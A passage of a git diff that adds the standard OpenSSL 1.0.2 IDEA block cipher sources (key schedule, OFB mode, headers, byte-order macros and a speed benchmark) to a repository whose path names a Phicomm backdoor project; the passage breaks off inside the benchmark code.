+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/idea.h>
+#include "idea_lcl.h"
+
+/*
+ * The input and output encrypted as though 64bit ofb mode is being used.
+ * The extra state information to record how much of the 64bit block we have
+ * used is contained in *num;
+ */
+void idea_ofb64_encrypt(const unsigned char *in, unsigned char *out,
+                        long length, IDEA_KEY_SCHEDULE *schedule,
+                        unsigned char *ivec, int *num)
+{
+    register unsigned long v0, v1, t;
+    register int n = *num;
+    register long l = length;
+    unsigned char d[8];
+    register char *dp;
+    unsigned long ti[2];
+    unsigned char *iv;
+    int save = 0;
+
+    iv = (unsigned char *)ivec;
+    n2l(iv, v0);
+    n2l(iv, v1);
+    ti[0] = v0;
+    ti[1] = v1;
+    dp = (char *)d;
+    l2n(v0, dp);
+    l2n(v1, dp);
+    while (l--) {
+        if (n == 0) {
+            idea_encrypt((unsigned long *)ti, schedule);
+            dp = (char *)d;
+            t = ti[0];
+            l2n(t, dp);
+            t = ti[1];
+            l2n(t, dp);
+            save++;
+        }
+        *(out++) = *(in++) ^ d[n];
+        n = (n + 1) & 0x07;
+    }
+    if (save) {
+        v0 = ti[0];
+        v1 = ti[1];
+        iv = (unsigned char *)ivec;
+        l2n(v0, iv);
+        l2n(v1, iv);
+    }
+    t = v0 = v1 = ti[0] = ti[1] = 0;
+    *num = n;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/i_skey.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/i_skey.c
new file mode 100644
index 0000000..5365151
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/i_skey.c
@@ -0,0 +1,171 @@
+/* crypto/idea/i_skey.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/crypto.h>
+#include <openssl/idea.h>
+#include "idea_lcl.h"
+
+static IDEA_INT inverse(unsigned int xin);
+void idea_set_encrypt_key(const unsigned char *key, IDEA_KEY_SCHEDULE *ks)
+#ifdef OPENSSL_FIPS
+{
+    fips_cipher_abort(IDEA);
+    private_idea_set_encrypt_key(key, ks);
+}
+
+void private_idea_set_encrypt_key(const unsigned char *key,
+                                  IDEA_KEY_SCHEDULE *ks)
+#endif
+{
+    int i;
+    register IDEA_INT *kt, *kf, r0, r1, r2;
+
+    kt = &(ks->data[0][0]);
+    n2s(key, kt[0]);
+    n2s(key, kt[1]);
+    n2s(key, kt[2]);
+    n2s(key, kt[3]);
+    n2s(key, kt[4]);
+    n2s(key, kt[5]);
+    n2s(key, kt[6]);
+    n2s(key, kt[7]);
+
+    kf = kt;
+    kt += 8;
+    for (i = 0; i < 6; i++) {
+        r2 = kf[1];
+        r1 = kf[2];
+        *(kt++) = ((r2 << 9) | (r1 >> 7)) & 0xffff;
+        r0 = kf[3];
+        *(kt++) = ((r1 << 9) | (r0 >> 7)) & 0xffff;
+        r1 = kf[4];
+        *(kt++) = ((r0 << 9) | (r1 >> 7)) & 0xffff;
+        r0 = kf[5];
+        *(kt++) = ((r1 << 9) | (r0 >> 7)) & 0xffff;
+        r1 = kf[6];
+        *(kt++) = ((r0 << 9) | (r1 >> 7)) & 0xffff;
+        r0 = kf[7];
+        *(kt++) = ((r1 << 9) | (r0 >> 7)) & 0xffff;
+        r1 = kf[0];
+        if (i >= 5)
+            break;
+        *(kt++) = ((r0 << 9) | (r1 >> 7)) & 0xffff;
+        *(kt++) = ((r1 << 9) | (r2 >> 7)) & 0xffff;
+        kf += 8;
+    }
+}
+
+void idea_set_decrypt_key(IDEA_KEY_SCHEDULE *ek, IDEA_KEY_SCHEDULE *dk)
+{
+    int r;
+    register IDEA_INT *fp, *tp, t;
+
+    tp = &(dk->data[0][0]);
+    fp = &(ek->data[8][0]);
+    for (r = 0; r < 9; r++) {
+        *(tp++) = inverse(fp[0]);
+        *(tp++) = ((int)(0x10000L - fp[2]) & 0xffff);
+        *(tp++) = ((int)(0x10000L - fp[1]) & 0xffff);
+        *(tp++) = inverse(fp[3]);
+        if (r == 8)
+            break;
+        fp -= 6;
+        *(tp++) = fp[4];
+        *(tp++) = fp[5];
+    }
+
+    tp = &(dk->data[0][0]);
+    t = tp[1];
+    tp[1] = tp[2];
+    tp[2] = t;
+
+    t = tp[49];
+    tp[49] = tp[50];
+    tp[50] = t;
+}
+
+/* taken directly from the 'paper' I'll have a look at it later */
+static IDEA_INT inverse(unsigned int xin)
+{
+    long n1, n2, q, r, b1, b2, t;
+
+    if (xin == 0)
+        b2 = 0;
+    else {
+        n1 = 0x10001;
+        n2 = xin;
+        b2 = 1;
+        b1 = 0;
+
+        do {
+            r = (n1 % n2);
+            q = (n1 - r) / n2;
+            if (r == 0) {
+                if (b2 < 0)
+                    b2 = 0x10001 + b2;
+            } else {
+                n1 = n2;
+                n2 = r;
+                t = b2;
+                b2 = b1 - q * b2;
+                b1 = t;
+            }
+        } while (r != 0);
+    }
+    return ((IDEA_INT) b2);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/idea.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/idea.h
new file mode 100644
index 0000000..6075984
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/idea.h
@@ -0,0 +1,105 @@
+/* crypto/idea/idea.h */
+/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_IDEA_H
+# define HEADER_IDEA_H
+
+# include <openssl/opensslconf.h>/* IDEA_INT, OPENSSL_NO_IDEA */
+
+# ifdef OPENSSL_NO_IDEA
+#  error IDEA is disabled.
+# endif
+
+# define IDEA_ENCRYPT    1
+# define IDEA_DECRYPT    0
+
+# define IDEA_BLOCK      8
+# define IDEA_KEY_LENGTH 16
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+typedef struct idea_key_st {
+    IDEA_INT data[9][6];
+} IDEA_KEY_SCHEDULE;
+
+const char *idea_options(void);
+void idea_ecb_encrypt(const unsigned char *in, unsigned char *out,
+                      IDEA_KEY_SCHEDULE *ks);
+# ifdef OPENSSL_FIPS
+void private_idea_set_encrypt_key(const unsigned char *key,
+                                  IDEA_KEY_SCHEDULE *ks);
+# endif
+void idea_set_encrypt_key(const unsigned char *key, IDEA_KEY_SCHEDULE *ks);
+void idea_set_decrypt_key(IDEA_KEY_SCHEDULE *ek, IDEA_KEY_SCHEDULE *dk);
+void idea_cbc_encrypt(const unsigned char *in, unsigned char *out,
+                      long length, IDEA_KEY_SCHEDULE *ks, unsigned char *iv,
+                      int enc);
+void idea_cfb64_encrypt(const unsigned char *in, unsigned char *out,
+                        long length, IDEA_KEY_SCHEDULE *ks, unsigned char *iv,
+                        int *num, int enc);
+void idea_ofb64_encrypt(const unsigned char *in, unsigned char *out,
+                        long length, IDEA_KEY_SCHEDULE *ks, unsigned char *iv,
+                        int *num);
+void idea_encrypt(unsigned long *in, IDEA_KEY_SCHEDULE *ks);
+#ifdef  __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/idea_lcl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/idea_lcl.h
new file mode 100644
index 0000000..e406953
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/idea_lcl.h
@@ -0,0 +1,216 @@
+/* crypto/idea/idea_lcl.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*
+ * The new form of this macro (check if the a*b == 0) was suggested by Colin
+ * Plumb <colin@nyx10.cs.du.edu>
+ */
+/* Removal of the inner if from from Wei Dai 24/4/96 */
+#define idea_mul(r,a,b,ul) \
+ul=(unsigned long)a*b; \
+if (ul != 0) \
+        { \
+        r=(ul&0xffff)-(ul>>16); \
+        r-=((r)>>16); \
+        } \
+else \
+        r=(-(int)a-b+1);        /* assuming a or b is 0 and in range */
+
+#ifdef undef
+# define idea_mul(r,a,b,ul,sl) \
+if (a == 0) r=(0x10001-b)&0xffff; \
+else if (b == 0) r=(0x10001-a)&0xffff; \
+else    { \
+        ul=(unsigned long)a*b; \
+        sl=(ul&0xffff)-(ul>>16); \
+        if (sl <= 0) sl+=0x10001; \
+        r=sl; \
+        }
+#endif
+
+/*
+ * 7/12/95 - Many thanks to Rhys Weatherley <rweather@us.oracle.com> for
+ * pointing out that I was assuming little endian byte order for all
+ * quantities what idea actually used bigendian.  No where in the spec does
+ * it mention this, it is all in terms of 16 bit numbers and even the example
+ * does not use byte streams for the input example :-(. If you byte swap each
+ * pair of input, keys and iv, the functions would produce the output as the
+ * old version :-(.
+ */
+
+/* NOTE - c is not incremented as per n2l */
+#define n2ln(c,l1,l2,n) { \
+                        c+=n; \
+                        l1=l2=0; \
+                        switch (n) { \
+                        case 8: l2 =((unsigned long)(*(--(c))))    ; \
+                        case 7: l2|=((unsigned long)(*(--(c))))<< 8; \
+                        case 6: l2|=((unsigned long)(*(--(c))))<<16; \
+                        case 5: l2|=((unsigned long)(*(--(c))))<<24; \
+                        case 4: l1 =((unsigned long)(*(--(c))))    ; \
+                        case 3: l1|=((unsigned long)(*(--(c))))<< 8; \
+                        case 2: l1|=((unsigned long)(*(--(c))))<<16; \
+                        case 1: l1|=((unsigned long)(*(--(c))))<<24; \
+                                } \
+                        }
+
+/* NOTE - c is not incremented as per l2n */
+#define l2nn(l1,l2,c,n) { \
+                        c+=n; \
+                        switch (n) { \
+                        case 8: *(--(c))=(unsigned char)(((l2)    )&0xff); \
+                        case 7: *(--(c))=(unsigned char)(((l2)>> 8)&0xff); \
+                        case 6: *(--(c))=(unsigned char)(((l2)>>16)&0xff); \
+                        case 5: *(--(c))=(unsigned char)(((l2)>>24)&0xff); \
+                        case 4: *(--(c))=(unsigned char)(((l1)    )&0xff); \
+                        case 3: *(--(c))=(unsigned char)(((l1)>> 8)&0xff); \
+                        case 2: *(--(c))=(unsigned char)(((l1)>>16)&0xff); \
+                        case 1: *(--(c))=(unsigned char)(((l1)>>24)&0xff); \
+                                } \
+                        }
+
+#undef n2l
+#define n2l(c,l)        (l =((unsigned long)(*((c)++)))<<24L, \
+                         l|=((unsigned long)(*((c)++)))<<16L, \
+                         l|=((unsigned long)(*((c)++)))<< 8L, \
+                         l|=((unsigned long)(*((c)++))))
+
+#undef l2n
+#define l2n(l,c)        (*((c)++)=(unsigned char)(((l)>>24L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>16L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>> 8L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)     )&0xff))
+
+#undef s2n
+#define s2n(l,c)        (*((c)++)=(unsigned char)(((l)     )&0xff), \
+                         *((c)++)=(unsigned char)(((l)>> 8L)&0xff))
+
+#undef n2s
+#define n2s(c,l)        (l =((IDEA_INT)(*((c)++)))<< 8L, \
+                         l|=((IDEA_INT)(*((c)++)))      )
+
+#ifdef undef
+/* NOTE - c is not incremented as per c2l */
+# define c2ln(c,l1,l2,n) { \
+                        c+=n; \
+                        l1=l2=0; \
+                        switch (n) { \
+                        case 8: l2 =((unsigned long)(*(--(c))))<<24; \
+                        case 7: l2|=((unsigned long)(*(--(c))))<<16; \
+                        case 6: l2|=((unsigned long)(*(--(c))))<< 8; \
+                        case 5: l2|=((unsigned long)(*(--(c))));     \
+                        case 4: l1 =((unsigned long)(*(--(c))))<<24; \
+                        case 3: l1|=((unsigned long)(*(--(c))))<<16; \
+                        case 2: l1|=((unsigned long)(*(--(c))))<< 8; \
+                        case 1: l1|=((unsigned long)(*(--(c))));     \
+                                } \
+                        }
+
+/* NOTE - c is not incremented as per l2c */
+# define l2cn(l1,l2,c,n) { \
+                        c+=n; \
+                        switch (n) { \
+                        case 8: *(--(c))=(unsigned char)(((l2)>>24)&0xff); \
+                        case 7: *(--(c))=(unsigned char)(((l2)>>16)&0xff); \
+                        case 6: *(--(c))=(unsigned char)(((l2)>> 8)&0xff); \
+                        case 5: *(--(c))=(unsigned char)(((l2)    )&0xff); \
+                        case 4: *(--(c))=(unsigned char)(((l1)>>24)&0xff); \
+                        case 3: *(--(c))=(unsigned char)(((l1)>>16)&0xff); \
+                        case 2: *(--(c))=(unsigned char)(((l1)>> 8)&0xff); \
+                        case 1: *(--(c))=(unsigned char)(((l1)    )&0xff); \
+                                } \
+                        }
+
+# undef c2s
+# define c2s(c,l)        (l =((unsigned long)(*((c)++)))    , \
+                         l|=((unsigned long)(*((c)++)))<< 8L)
+
+# undef s2c
+# define s2c(l,c)        (*((c)++)=(unsigned char)(((l)     )&0xff), \
+                         *((c)++)=(unsigned char)(((l)>> 8L)&0xff))
+
+# undef c2l
+# define c2l(c,l)        (l =((unsigned long)(*((c)++)))     , \
+                         l|=((unsigned long)(*((c)++)))<< 8L, \
+                         l|=((unsigned long)(*((c)++)))<<16L, \
+                         l|=((unsigned long)(*((c)++)))<<24L)
+
+# undef l2c
+# define l2c(l,c)        (*((c)++)=(unsigned char)(((l)     )&0xff), \
+                         *((c)++)=(unsigned char)(((l)>> 8L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>16L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>24L)&0xff))
+#endif
+
+#define E_IDEA(num) \
+        x1&=0xffff; \
+        idea_mul(x1,x1,*p,ul); p++; \
+        x2+= *(p++); \
+        x3+= *(p++); \
+        x4&=0xffff; \
+        idea_mul(x4,x4,*p,ul); p++; \
+        t0=(x1^x3)&0xffff; \
+        idea_mul(t0,t0,*p,ul); p++; \
+        t1=(t0+(x2^x4))&0xffff; \
+        idea_mul(t1,t1,*p,ul); p++; \
+        t0+=t1; \
+        x1^=t1; \
+        x4^=t0; \
+        ul=x2^t0; /* do the swap to x3 */ \
+        x2=x3^t1; \
+        x3=ul;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/idea_spd.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/idea_spd.c
new file mode 100644
index 0000000..59acc40
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/idea/idea_spd.c
@@ -0,0 +1,283 @@
+/* crypto/idea/idea_spd.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/* 11-Sep-92 Andrew Daviel   Support for Silicon Graphics IRIX added */
+/* 06-Apr-92 Luke Brennan    Support for VMS and add extra signal calls */
+
+#if !defined(OPENSSL_SYS_MSDOS) && (!defined(OPENSSL_SYS_VMS) || defined(__DECC)) && !defined(OPENSSL_SYS_MACOSX)
+# define TIMES
+#endif
+
+#include <stdio.h>
+
+#include <openssl/e_os2.h>
+#include OPENSSL_UNISTD_IO
+OPENSSL_DECLARE_EXIT
+#ifndef OPENSSL_SYS_NETWARE
+# include <signal.h>
+#endif
+#ifndef _IRIX
+# include <time.h>
+#endif
+#ifdef TIMES
+# include <sys/types.h>
+# include <sys/times.h>
+#endif
+    /*
+     * Depending on the VMS version, the tms structure is perhaps defined.
+     * The __TMS macro will show if it was.  If it wasn't defined, we should
+     * undefine TIMES, since that tells the rest of the program how things
+     * should be handled.  -- Richard Levitte
+     */
+#if defined(OPENSSL_SYS_VMS_DECC) && !defined(__TMS)
+# undef TIMES
+#endif
+#ifndef TIMES
+# include <sys/timeb.h>
+#endif
+#if defined(sun) || defined(__ultrix)
+# define _POSIX_SOURCE
+# include <limits.h>
+# include <sys/param.h>
+#endif
+#include <openssl/idea.h>
+/* The following if from times(3) man page.  It may need to be changed */
+#ifndef HZ
+# ifndef CLK_TCK
+#  define HZ      100.0
+# else                          /* CLK_TCK */
+#  define HZ ((double)CLK_TCK)
+# endif
+#endif
+#define BUFSIZE ((long)1024)
+long run = 0;
+
+double Time_F(int s);
+#ifdef SIGALRM
+# if defined(__STDC__) || defined(sgi) || defined(_AIX)
+#  define SIGRETTYPE void
+# else
+#  define SIGRETTYPE int
+# endif
+
+SIGRETTYPE sig_done(int sig);
+SIGRETTYPE sig_done(int sig)
+{
+    signal(SIGALRM, sig_done);
+    run = 0;
+# ifdef LINT
+    sig = sig;
+# endif
+}
+#endif
+
+#define START   0
+#define STOP    1
+
+double Time_F(int s)
+{
+    double ret;
+#ifdef TIMES
+    static struct tms tstart, tend;
+
+    if (s == START) {
+        times(&tstart);
+        return (0);
+    } else {
+        times(&tend);
+        ret = ((double)(tend.tms_utime - tstart.tms_utime)) / HZ;
+        return ((ret == 0.0) ? 1e-6 : ret);
+    }
+#else                           /* !times() */
+    static struct timeb tstart, tend;
+    long i;
+
+    if (s == START) {
+        ftime(&tstart);
+        return (0);
+    } else {
+        ftime(&tend);
+        i = (long)tend.millitm - (long)tstart.millitm;
+        ret = ((double)(tend.time - tstart.time)) + ((double)i) / 1e3;
+        return ((ret == 0.0) ? 1e-6 : ret);
+    }
+#endif
+}
+
+int main(int argc, char **argv)
+{
+    long count;
+    static unsigned char buf[BUFSIZE];
+    static unsigned char key[] = {
+        0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0,
+        0xfe, 0xdc, 0xba, 0x98, 0x76, 0x54, 0x32, 0x10,
+    };
+    IDEA_KEY_SCHEDULE sch;
+    double a, aa, b, c, d;
+#ifndef SIGALRM
+    long ca, cca, cb, cc;
+#endif
+
+#ifndef TIMES
+    printf("To get the most accurate results, try to run this\n");
+    printf("program when this computer is idle.\n");
+#endif
+
+#ifndef SIGALRM
+    printf("First we calculate the approximate speed ...\n");
+    idea_set_encrypt_key(key, &sch);
+    count = 10;
+    do {
+        long i;
+        IDEA_INT data[2];
+
+        count *= 2;
+        Time_F(START);
+        for (i = count; i; i--)
